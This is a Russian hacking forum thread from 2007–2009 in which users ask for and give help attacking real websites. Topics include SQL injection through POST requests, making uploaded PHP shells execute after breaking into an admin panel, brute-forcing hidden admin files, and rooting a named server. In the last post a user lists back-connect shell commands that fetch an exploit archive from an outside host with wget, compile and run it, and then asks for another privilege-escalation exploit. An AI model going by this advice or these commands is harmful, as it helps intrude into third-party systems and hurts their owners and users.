Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    Я повторю свои вопросы более конкретно. Хотелось бы услышать ясный и чёткий ответ, если ты действительно понимаешь зачем это делать, а не просто тупо прочитал где-то (я даже знаю где) и теперь не задумываясь постишь это тут.

    Вопросы:
    Зачем я должен проделывать такие вещи с хекс эдитором?
    Что КОНКРЕТНО это даёт?
    Почему нужно менять именно эти байты?
    Как это поможет при заливке картинки и что изменится если я этого делать не буду, а просто впихну код в конец никак не заморачиваясь с этими чудесами, или в метаданные, с которыми, кстати, заморачиваться не нужно, это элементарная операция?
    Какую проверку это позволит обойти, из тех, что невозможно обойти предложенными мной вариантами?
     
  2. 2Fed123

    2Fed123 Banned

    Joined:
    26 Feb 2009
    Messages:
    56
    Likes Received:
    5
    Reputations:
    0
    Как проводить sql inj через POST.Когда в одно из полей вставляю кавычку вылазит ошибка-1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
    Соответственно скуля есть,а вот как раскрутить хз.Помогите пожалуста.
     
    1 person likes this.
  3. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    942
    Likes Received:
    817
    Reputations:
    605
    пиши все тоже самое что и в GET запросе но тока в то поле вот тебе и будет POST запрос

    или в лисе перехвати запрос и поменяй его
     
    _________________________
  4. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    Видимо передавать запрос POST-ом.
    С уважением, Капитан Очевидность
     
    2 people like this.
  5. AnderTD

    AnderTD New Member

    Joined:
    15 Jul 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Такой вопрос, всю голову сломал уже...

    Нашел инъект, раскрутил, нашел пароль от админки, через админку можно заливать файлы с любым расширением, НО, php не выполняются, хтмл/гиф - отображаются корректно, а php - предлагается скачать файл при обращении, пробовал залить .htaccess в эту диру через админку - залилось вроде, проставил в нем выполнение html как php, бесполезно, что можно сделать?
     
  6. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    вполне возможно что там не апач а скажем nginx или их комбинация. Если это так то попытайся поискать дополнительную информацию в конфигах веб-сервера
     
  7. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Попробуй залить с расширением phtml или phps.
     
  8. AnderTD

    AnderTD New Member

    Joined:
    15 Jul 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Нет у меня доступа ни к другим дирам, ни к чему вообще, только формочка в админке с выбором файла (изображение для постинга новостей, не фильтрует расширение). Можно ли как-то заставить сервер выполнять php скрипты в этой дире? Хтмл, яваскрипт, все пашет, пхп - нет, заливка .htaccess не помогает как я понял.
    Других вариантов кроме шелла через админку - нет, даже не предлагайте.
     
  9. AnderTD

    AnderTD New Member

    Joined:
    15 Jul 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    "Попробуй залить с расширением phtml или phps."

    Пробовал phtml - бесполезно, отображает содержимое скрипта, не воспринимает на исполнение в отличии от php, который воспринимается как скрипт-приложение.
     
  10. AnderTD

    AnderTD New Member

    Joined:
    15 Jul 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Суть в том, что видимо в этом каталоге запрещено выполнение php-скриптов, заливка своего .htaccess не помогает видимо, пробовал разрешить выполнение .html, phtml и .jpg как php-скрипт - не катит, есть варианты?
     
  11. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    pl,ssi вот ишо парочка вариантов
     
  12. WNZRS

    WNZRS Member

    Joined:
    3 Sep 2009
    Messages:
    295
    Likes Received:
    53
    Reputations:
    1
    можно ли вместе с запросом типа "SELECT * FROM news WHERE id=g_ID", где g_ID не фильтрованное значение $_GET['id'] использовать запросы UPDATE или INSERT ?
     
  13. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Если mysql - нет.
     
  14. peonix

    peonix New Member

    Joined:
    8 Nov 2008
    Messages:
    32
    Likes Received:
    2
    Reputations:
    -1
    всем привет!
    При обращении к скрипту (бeз параметров) вылетает куча таких ошибок, можно ли это как нибудь раскрутить?
     
    #8994 peonix, 25 Sep 2009
    Last edited: 25 Sep 2009
  15. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Нет.
     
    1 person likes this.
  16. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    Почему нельзя :eek:
    Если попробовать манипуляции со скриптом, могут появится различные дополнительные ошибки :)
     
  17. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    скуля тут не прокатит. Раскрытие путей разве что
     
  18. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Ну и толку? Раскрытие путей уже получили, но конекта то с БД нет .. конкретно с его скрипта доп-но ничего не выжать, учитывая ту информацию, что он предоставил в этой ветке.
     
    1 person likes this.
  19. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    323
    Likes Received:
    110
    Reputations:
    18
    такая проблема ,есть сайт надо найти админку,
    site/admin/ 403 форбайден.
    мне надо найди файлы в папке site/admin/,если ли софт для брута файлов?
    можно канешно сгенирить списки,и прочекать линки ,но это на случай что спец софта нету
     
  20. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Если в .htaccess на все файлы стоит Forbidden, то никак.

    Есть вопрос по руту сервака. Делаю back-коннект к себе. Комманды:

    Code:
    cd /tmp
    wget http://evilcode.hmarka.net/2.tgz
    gcc run.c -O run
    ./run
    padlina z lublina! //это выводит после запуска
    id
    Code:
    uid=48(apache) gid=48(apache) groups=48(apache),503(nismo),504(shopua@rambler.ru),505(shopua555),506(kamar),507(geniewgen)  
    Т.е. сервак не порутался... Как его порутать? Есть ли сплоит какой?

    Code:
    Linux shopua.com.ua 2.6.26.8-57.fc8 #1 SMP Thu Dec 18 19:19:45 EST 2008 i686 athlon i386 GNU/Linux
     
Loading...
Thread Status:
Not open for further replies.